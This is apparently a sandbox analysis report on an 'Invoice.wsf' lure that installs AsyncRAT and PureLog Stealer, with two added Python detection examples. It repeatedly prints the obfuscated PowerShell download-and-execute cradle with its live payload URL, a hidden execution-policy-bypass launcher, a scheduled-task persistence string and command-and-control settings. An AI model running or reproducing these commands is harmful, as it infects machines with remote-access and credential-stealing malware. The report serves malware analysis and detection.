

Windows Analysis Report
Invoice.wsf

Overview

General Information

Sample name: Invoice.wsf
Analysis ID: 1501359
MD5: 0f1b72e0372d3d3e8821218284638861
SHA1: b136b689cb0fbf9558c4b7860ddca264d53c156c
SHA256: 20e31873e4b69f416a7c31d9b35be80f8db14e7b28f440a43ca3c294abe892e8
Tags: wsf

Detection

AsyncRAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6216 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 2032 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 5428 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7104 cmdline: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 3592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
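The launcher on PID 1344 hides IEX(New-Object Net.WebClient).DownloadString(...) by splitting it across three single-quoted variables, padding the statement list with no-op [BYTe[]] type literals, and swapping the placeholder -@-@-@-$-%^ for ADSTRING only at runtime, so a string match on "DownloadString" against the raw command line misses it. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it resolves this concatenate-and-replace shape statically (no PowerShell is executed) by evaluating the single-quoted literals, applying each .Replace() chain and joining the variables handed to IEX. The regexes, function names and the `[BYTe[]]`-free interpretation of the statement list are the example's own; it handles only this shape and returns None for anything else.

```python
import re

# Obfuscated launcher argument exactly as it appears in the process tree for PID 1344
# (copied from the report; the powershell.exe path itself is omitted).
SAMPLE_CMDLINE = (
    "[BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];"
    "$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'"
    ".RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)"
)

# PowerShell single-quoted literal: no escapes at all except '' for one literal quote.
_LIT = r"'(?:[^']|'')*'"
# $name = 'literal' followed by zero or more .Replace('old','new') calls (case-insensitive).
_ASSIGN_RE = re.compile(
    r"\$(\w+)\s*=\s*(" + _LIT + r")((?:\s*\.replace\(\s*" + _LIT + r"\s*,\s*" + _LIT + r"\s*\))*)",
    re.I,
)
_REPLACE_RE = re.compile(r"\.replace\(\s*(" + _LIT + r")\s*,\s*(" + _LIT + r")\s*\)", re.I)
# IEX($a+$b+...) with variable operands only; any other operand shape is left unresolved.
_IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\s*\(\s*((?:\$\w+\s*\+\s*)*\$\w+)\s*\)", re.I)
_URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
_CRADLE_RE = re.compile(r"downloadstring|downloadfile|downloaddata", re.I)


def unquote(lit: str) -> str:
    """Drop the surrounding quotes and collapse '' to ' (the PowerShell rule)."""
    return lit[1:-1].replace("''", "'")


def resolve_variables(cmdline: str) -> dict:
    """Evaluate every $var='...'(.Replace(...))* statement. Keys are lower-cased
    because PowerShell variable names are case-insensitive."""
    env = {}
    for name, lit, chain in _ASSIGN_RE.findall(cmdline):
        value = unquote(lit)
        for old, new in _REPLACE_RE.findall(chain):
            value = value.replace(unquote(old), unquote(new))
        env[name.lower()] = value
    return env


def resolve_iex(cmdline: str):
    """Return the text IEX would have executed, or None if the shape is not
    IEX($var+$var+...) over literal-assigned variables."""
    env = resolve_variables(cmdline)
    m = _IEX_RE.search(cmdline)
    if m is None:
        return None
    names = [p.strip().lstrip("$").lower() for p in m.group(1).split("+")]
    try:
        return "".join(env[n] for n in names)
    except KeyError:
        return None  # an operand was never assigned a literal in this command line


def has_download_cradle(text: str) -> bool:
    """True when a WebClient download method name is visible in the text."""
    return bool(text) and _CRADLE_RE.search(text) is not None


def summarize(cmdline: str) -> dict:
    """Resolved command, URLs and cradle verdict, computed on the resolved text
    when resolution succeeds and on the raw command line otherwise."""
    resolved = resolve_iex(cmdline)
    text = resolved if resolved is not None else cmdline
    return {
        "resolved": resolved,
        "urls": sorted(set(_URL_RE.findall(text))),
        "download_cradle": has_download_cradle(text),
    }


if __name__ == "__main__":
    for k, v in summarize(SAMPLE_CMDLINE).items():
        print(f"{k}: {v}")
```

On the report's command line this recovers IeX(NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('https://afclifescience-tiurma.com/rkem.jpg'); the cradle check fails on the raw line and succeeds on the resolved one, which is the whole reason the sample splits DOWNLO from ADSTRING.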
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Extracted malware configuration:
{"Server": "kareemovic11.duckdns.org", "Port": "6606,7707,8808", "Version": "AWS | RxR  ", "MutexName": "AsyncMutex_dikojiosidjoishouisddksjmfnldjvfdonlkd", "Autorun": "false", "Group": "true"}
Source: dump.pcap
Rule: MALWARE_Win_AsyncRAT (Detects AsyncRAT; author: ditekSHen)
Strings:
  • 0xe9d30:$x1: AsyncRAT
  • 0xe9d6e:$x1: AsyncRAT

Memory dump matches:
Source: 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp
Rule: JoeSecurity_PureLogStealer (Yara detected PureLog Stealer; author: Joe Security)

Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp
Rule: MALWARE_Win_AsyncRAT (Detects AsyncRAT; author: ditekSHen)
Strings:
  • 0x3650b:$x1: AsyncRAT
  • 0x36549:$x1: AsyncRAT

Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp
Rule: MALWARE_Win_AsyncRAT (Detects AsyncRAT; author: ditekSHen)
Strings:
  • 0x2aac3:$x1: AsyncRAT
  • 0x2ab01:$x1: AsyncRAT
  • 0x2d18f:$x1: AsyncRAT
  • 0x2d1cd:$x1: AsyncRAT

Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_AsyncRAT (Yara detected AsyncRAT; author: Joe Security)

Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp
Rule: Windows_Trojan_Asyncrat_11a11ba1 (description: unknown; author: unknown)
Strings:
  • 0x1d894:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0x21028:$a2: Stub.exe
  • 0x210b8:$a2: Stub.exe
  • 0x1a0d4:$a3: get_ActivatePong
  • 0x1daac:$a4: vmware
  • 0x1d924:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x1b041:$a6: get_SslClient
(truncated: 14 entries in the full report)

Unpacked PE matches:
Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack
Rule: JoeSecurity_PureLogStealer (Yara detected PureLog Stealer; author: Joe Security)

Source: 6.2.powershell.exe.2389d3d0000.2.unpack
Rule: JoeSecurity_PureLogStealer (Yara detected PureLog Stealer; author: Joe Security)

Source: 6.2.powershell.exe.23886ebeab0.0.unpack
Rule: JoeSecurity_PureLogStealer (Yara detected PureLog Stealer; author: Joe Security)

Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack
Rule: JoeSecurity_PureLogStealer (Yara detected PureLog Stealer; author: Joe Security)

Source: 6.2.powershell.exe.238854bf788.1.unpack
Rule: JoeSecurity_AsyncRAT (Yara detected AsyncRAT; author: Joe Security)
(truncated: 9 entries in the full report)

                System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6216, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), ProcessId: 1344, ProcessName: powershell.exe
Source: File created; Author: Subhash Popuri (@pbssubhash); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1344, TargetFilename: C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , ProcessId: 2032, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , ProcessId: 2032, ProcessName: wscript.exe
Source: File created; Author: Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1344, TargetFilename: C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'", CommandLine: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5428, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'", ProcessId: 7104, ProcessName: powershell.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1344, TargetFilename: C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat
Source: Network Connection; Author: frack113; Data: DestinationIp: 192.185.141.13, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6216, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", ProcessId: 6216, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6216, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), ProcessId: 1344, ProcessName: powershell.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1344, TargetFilename: C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1
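The Sigma hits above describe a single chain: WScript.exe runs the lure and spawns the obfuscated PowerShell (PID 1344), which drops a .vbs/.bat/.ps1 trio into C:\Users\Public; a second WScript.exe runs that .vbs, which runs cmd.exe, which runs a hidden, policy-bypassing PowerShell that ends in a bare RegSvcs.exe (the process the AsyncRAT payload is injected into). The Python below is an added example, not part of the report or of any Sigma rule set: it encodes those parent/child relationships as process-tree rules and runs them over a constructed list of process-creation events built from the PIDs and command lines in this report. The explorer.exe parent (PID 2580) is an assumption, since the report records it only as a ParentProcessId, and PID 1044 (parent of the second wscript) is deliberately left out of the event list so the ancestor walk has to cope with a missing parent. The rule names are the example's own.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe"}    # transparent hops: wscript -> cmd -> powershell is still wscript -> powershell
# .NET utilities commonly used as injection hosts; a legitimate invocation always carries arguments.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe", "applaunch.exe"}

# Constructed from this report's process tree. PID 2580 (explorer.exe) is an assumption;
# PID 1044 is intentionally absent. Command lines are copied from the report.
SAMPLE_EVENTS = [
    ProcEvent(2580, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(6216, 2580, r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf"'),
    ProcEvent(1344, 6216, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)"""),
    ProcEvent(3688, 1344, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(2032, 1044, r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs"'),
    ProcEvent(5428, 2032, r"C:\Windows\System32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "'),
    ProcEvent(3756, 5428, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(7104, 5428, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
              "-Command \"& 'C:\\Users\\Public\\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'\""),
    ProcEvent(3592, 7104, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
]

_EXEC_BYPASS = re.compile(r"-e[a-z]*\s+bypass")   # -ExecutionPolicy / -ep / -exec Bypass
_HIDDEN = re.compile(r"-w[a-z]*\s+hidden")        # -WindowStyle / -w Hidden


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _args(cmdline: str) -> str:
    """Everything after the (possibly quoted) image token; '' when there is nothing."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def ancestors(ev: ProcEvent, by_pid: dict, max_depth: int = 8) -> list:
    """Parent chain, nearest first. Stops at a missing parent or at max_depth,
    which also bounds a cycle caused by PID reuse."""
    chain, cur = [], by_pid.get(ev.ppid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def detect(events: list) -> list:
    """Return (rule, pid) pairs for every event that satisfies a chain rule."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        name, cl = _name(e.image), e.cmdline.lower()
        lineage = [_name(a.image) for a in ancestors(e, by_pid)]
        if name == "powershell.exe":
            origin = next((n for n in lineage if n not in SHELLS), None)  # skip cmd.exe hops
            if origin in SCRIPT_HOSTS:
                hits.append(("script_host_launches_powershell", e.pid))
            if _EXEC_BYPASS.search(cl) and _HIDDEN.search(cl):
                hits.append(("powershell_hidden_policy_bypass", e.pid))
        if name in SCRIPT_HOSTS and "\\users\\public\\" in cl:
            hits.append(("script_host_from_public", e.pid))
        if name in DOTNET_HOSTS and not _args(e.cmdline) and "powershell.exe" in lineage:
            hits.append(("dotnet_host_under_powershell", e.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:36s} PID {pid}")
```

Against the constructed events this flags PIDs 1344 and 7104 as PowerShell descended from a script host, 2032 as a script host running out of C:\Users\Public, 7104 for the hidden/Bypass combination, and 3592 as an argument-less RegSvcs.exe under PowerShell; conhost.exe and the explorer parent produce nothing. The lineage walk is what lets the second rule catch the cmd.exe-mediated chain that a plain parent/child match would miss.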

                Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6216, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), ProcessId: 1344, ProcessName: powershell.exe
                Timestamp:2024-08-29T19:42:20.837888+0200
                SID:2842478
                Severity:1
                Source Port:7707
                Destination Port:49738
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T19:42:20.837888+0200
                SID:2030673
                Severity:1
                Source Port:7707
                Destination Port:49738
                Protocol:TCP
                Classtype:Domain Observed Used for C2 Detected
                Timestamp:2024-08-29T19:42:20.837888+0200
                SID:2035595
                Severity:1
                Source Port:7707
                Destination Port:49738
                Protocol:TCP
                Classtype:Domain Observed Used for C2 Detected
                Timestamp:2024-08-29T19:42:20.837888+0200
                SID:2035607
                Severity:1
                Source Port:7707
                Destination Port:49738
                Protocol:TCP
                Classtype:Domain Observed Used for C2 Detected



                AV Detection

Source: kareemovic11.duckdns.org; Avira URL Cloud: Label: malware
Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: AsyncRAT {"Server": "kareemovic11.duckdns.org", "Port": "6606,7707,8808", "Version": "AWS | RxR ", "MutexName": "AsyncMutex_dikojiosidjoishouisddksjmfnldjvfdonlkd", "Autorun": "false", "Group": "true"}
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown; HTTPS traffic detected: 192.185.141.13:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 192.185.141.13:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Binary string: NewPE2.pdb; source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: NewPE2.pdb(@; source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp

                Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

Source: Network traffic; Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 104.243.37.177:7707 -> 192.168.2.4:49738
Source: Network traffic; Suricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 104.243.37.177:7707 -> 192.168.2.4:49738
Source: Network traffic; Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 104.243.37.177:7707 -> 192.168.2.4:49738
Source: Network traffic; Suricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 104.243.37.177:7707 -> 192.168.2.4:49738
Source: C:\Windows\System32\wscript.exe; Network Connect: 192.185.141.13 443
Source: Malware configuration extractor; URLs: kareemovic11.duckdns.org
Source: unknown; DNS query: name: kareemovic11.duckdns.org
Source: Yara match; File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.4:49738 -> 104.243.37.177:7707
Source: global traffic; HTTP traffic detected: GET /rkem.jpg HTTP/1.1; Host: afclifescience-tiurma.com; Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 192.185.141.13
